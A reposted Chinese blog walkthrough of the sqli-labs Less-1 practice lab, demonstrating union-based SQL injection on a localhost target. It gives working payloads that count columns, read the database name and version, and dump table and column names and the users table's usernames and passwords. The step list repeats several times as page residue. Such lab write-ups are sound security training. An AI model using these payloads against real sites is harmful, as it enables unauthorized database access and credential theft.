sqli-labs(less-1)

less-1(union联合注入)

1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs****/less-1为例子)

2.利用order判断字段数

Order by x(数字) 正确与错误的正常值正确网页正常显示，错误网页报错

?id=1' order by 3 ---

3.利用union select 联合查询，将id值设置成不成立，即可探测到可利用的字段数

?id=-1' union select 1,2,3 -- -

4.利用函数database(),user(),version()可以得到所侦测数据库的数据库名，用户名和版本号

?id=-1' union select 1,database(),version() -- -

5.利用 union select 联合查询，获取表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- -

6.利用 union select 联合查询，获取字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- -

7.利用 union select 联合查询，获取字段值

?id=-1' union select 1,2,group_concat(username,':',password) from users -- -

标签： sql 安全数据库

本文转载自: https://blog.csdn.net/m0_63127854/article/details/125731511
版权归原作者 不知名白帽 所有，如有侵权，请联系我们删除。

less-1(union联合注入)

1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs****/less-1为例子)

2.利用order判断字段数

3.利用union select 联合查询，将id值设置成不成立，即可探测到可利用的字段数

4.利用函数database(),user(),version()可以得到所侦测数据库的数据库名，用户名和版本号

5.利用 union select 联合查询，获取表名

6.利用 union select 联合查询，获取字段名

7.利用 union select 联合查询，获取字段值

发表评论

“sqli-labs(less-1)”的评论:

关于作者

overfit同步小助手

相关阅读

文章导航

sqli-labs(less-1)

less-1(union联合注入)

1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs********/less-1为例子)****

****2.****利用order判断字段数

****3.****利用union select 联合查询，将id值设置成不成立，即可探测到可利用的字段数

****4.****利用函数database(),user(),version()可以得到所侦测数据库的数据库名，用户名和版本号

****5.****利用 union select 联合查询，获取表名

****6.****利用 union select 联合查询，获取字段名

****7.****利用 union select 联合查询，获取字段值

发表评论

“sqli-labs(less-1)”的评论:

关于作者

overfit同步小助手

相关阅读

文章导航

1.根据注入位置数据类型将sql注入分类(以localhost/sqli-labs****/less-1为例子)

2.利用order判断字段数

3.利用union select 联合查询，将id值设置成不成立，即可探测到可利用的字段数

4.利用函数database(),user(),version()可以得到所侦测数据库的数据库名，用户名和版本号

5.利用 union select 联合查询，获取表名

6.利用 union select 联合查询，获取字段名

7.利用 union select 联合查询，获取字段值